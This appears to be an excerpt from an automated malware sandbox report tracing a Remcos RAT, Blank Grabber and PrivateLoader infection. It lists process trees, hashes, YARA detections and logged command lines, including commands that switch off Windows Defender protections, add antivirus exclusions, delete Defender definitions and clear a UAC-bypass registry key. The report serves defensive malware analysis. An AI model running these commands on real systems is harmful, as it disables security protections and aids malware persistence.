                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:reg delete hkcu\Software\Classes\ms-settings /f
                                                                                                                                                                                                                                Imagebase:0x7ff60ebe0000
                                                                                                                                                                                                                                File size:77'312 bytes
                                                                                                                                                                                                                                MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:46
                                                                                                                                                                                                                                Start time:16:41:25
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\DE5A.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff6c99c0000
                                                                                                                                                                                                                                File size:8'850'847 bytes
                                                                                                                                                                                                                                MD5 hash:CB769D049C4541F926F5D6B8D1FF5929
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 0000002E.00000003.2491861380.000001E8E77E6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000002E.00000003.2495061783.000001E8E7F87000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000002E.00000003.2495061783.000001E8E7F87000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000002E.00000003.2495061783.000001E8E7F87000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 0000002E.00000002.2582736276.000001E8E77F5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000002E.00000003.2496650937.000001E8E8091000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000002E.00000003.2496650937.000001E8E8091000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 0000002E.00000003.2496650937.000001E8E8091000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000002E.00000003.2496650937.000001E8E8091000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 0000002E.00000003.2491188637.000001E8E77E5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 0000002E.00000002.2582242198.000001E8E75F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 0000002E.00000003.2495171507.000001E8E7A12000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:48
                                                                                                                                                                                                                                Start time:16:41:27
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\DE5A.exe'"
                                                                                                                                                                                                                                Imagebase:0x7ff6ccb20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:49
                                                                                                                                                                                                                                Start time:16:41:27
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                                                                                                                                                                Imagebase:0x7ff6ccb20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:50
                                                                                                                                                                                                                                Start time:16:41:27
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:51
                                                                                                                                                                                                                                Start time:16:41:27
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:52
                                                                                                                                                                                                                                Start time:16:41:27
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                                                                                                                                                Imagebase:0x7ff788560000
                                                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:53
                                                                                                                                                                                                                                Start time:16:41:27
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\DE5A.exe'
                                                                                                                                                                                                                                Imagebase:0x7ff788560000
                                                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:54
                                                                                                                                                                                                                                Start time:16:41:27
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'"
                                                                                                                                                                                                                                Imagebase:0x7ff6ccb20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:55
                                                                                                                                                                                                                                Start time:16:41:27
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "start bound.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff6ccb20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:56
                                                                                                                                                                                                                                Start time:16:41:28
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:57
                                                                                                                                                                                                                                Start time:16:41:28
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:58
                                                                                                                                                                                                                                Start time:16:41:28
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                Imagebase:0x7ff6ccb20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:59
                                                                                                                                                                                                                                Start time:16:41:28
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:60
                                                                                                                                                                                                                                Start time:16:41:28
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                Imagebase:0x7ff75f0b0000
                                                                                                                                                                                                                                File size:106'496 bytes
                                                                                                                                                                                                                                MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:61
                                                                                                                                                                                                                                Start time:16:41:28
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\bound.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:bound.exe
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:494'592 bytes
                                                                                                                                                                                                                                MD5 hash:E5C79A33139A13DAAC52DA8DD0ABFC68
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000003D.00000003.2501512368.00000000006B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000003D.00000003.2501512368.00000000006B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000003D.00000003.2501512368.00000000006B0000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000003D.00000002.2542712079.000000000068E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 0000003D.00000000.2500162285.0000000000401000.00000020.00000001.01000000.00000030.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000003D.00000000.2500248903.0000000000459000.00000002.00000001.01000000.00000030.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000003D.00000000.2500248903.0000000000459000.00000002.00000001.01000000.00000030.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000003D.00000000.2500248903.0000000000459000.00000002.00000001.01000000.00000030.sdmp, Author: unknown
                                                                                                                                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000003D.00000002.2539602011.0000000000459000.00000002.00000001.01000000.00000030.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000003D.00000002.2539602011.0000000000459000.00000002.00000001.01000000.00000030.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000003D.00000002.2539602011.0000000000459000.00000002.00000001.01000000.00000030.sdmp, Author: unknown
                                                                                                                                                                                                                                • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 0000003D.00000002.2538043211.0000000000401000.00000020.00000001.01000000.00000030.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:62
                                                                                                                                                                                                                                Start time:16:41:28
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'
                                                                                                                                                                                                                                Imagebase:0x7ff788560000
                                                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:63
                                                                                                                                                                                                                                Start time:16:41:28
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                                Imagebase:0x7ff6ccb20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:64
                                                                                                                                                                                                                                Start time:16:41:28
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:65
                                                                                                                                                                                                                                Start time:16:41:28
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                                Imagebase:0x7ff741b40000
                                                                                                                                                                                                                                File size:576'000 bytes
                                                                                                                                                                                                                                MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:66
                                                                                                                                                                                                                                Start time:16:41:31
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:494'592 bytes
                                                                                                                                                                                                                                MD5 hash:E5C79A33139A13DAAC52DA8DD0ABFC68
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000042.00000002.2546887311.0000000000459000.00000002.00000001.01000000.00000031.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000042.00000002.2546887311.0000000000459000.00000002.00000001.01000000.00000031.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000042.00000002.2546887311.0000000000459000.00000002.00000001.01000000.00000031.sdmp, Author: unknown
                                                                                                                                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000042.00000003.2544077192.000000000074B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000042.00000003.2544077192.000000000074B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000042.00000003.2544077192.000000000074B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000042.00000003.2544077192.000000000074B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000042.00000000.2533901161.0000000000459000.00000002.00000001.01000000.00000031.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000042.00000000.2533901161.0000000000459000.00000002.00000001.01000000.00000031.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000042.00000000.2533901161.0000000000459000.00000002.00000001.01000000.00000031.sdmp, Author: unknown
                                                                                                                                                                                                                                • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000042.00000000.2533489068.0000000000401000.00000020.00000001.01000000.00000031.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000042.00000002.2546695187.0000000000401000.00000020.00000001.01000000.00000031.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000042.00000002.2550012688.0000000000630000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000042.00000002.2550012688.0000000000630000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000042.00000002.2550012688.0000000000630000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000042.00000002.2550012688.0000000000630000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000042.00000002.2550012688.0000000000630000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000042.00000002.2550012688.0000000000630000.00000040.10000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, Author: unknown
                                                                                                                                                                                                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, Author: unknown
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, Author: ditekSHen
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:67
                                                                                                                                                                                                                                Start time:16:41:32
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"c:\program files (x86)\internet explorer\iexplore.exe"
                                                                                                                                                                                                                                Imagebase:0xdc0000
                                                                                                                                                                                                                                File size:828'368 bytes
                                                                                                                                                                                                                                MD5 hash:6F0F06D6AB125A99E43335427066A4A1
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000043.00000002.2904070426.00000000036CA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000043.00000002.2902843382.0000000003300000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000043.00000002.2902843382.0000000003300000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000043.00000002.2902843382.0000000003300000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000043.00000002.2902843382.0000000003300000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000043.00000002.2902843382.0000000003300000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
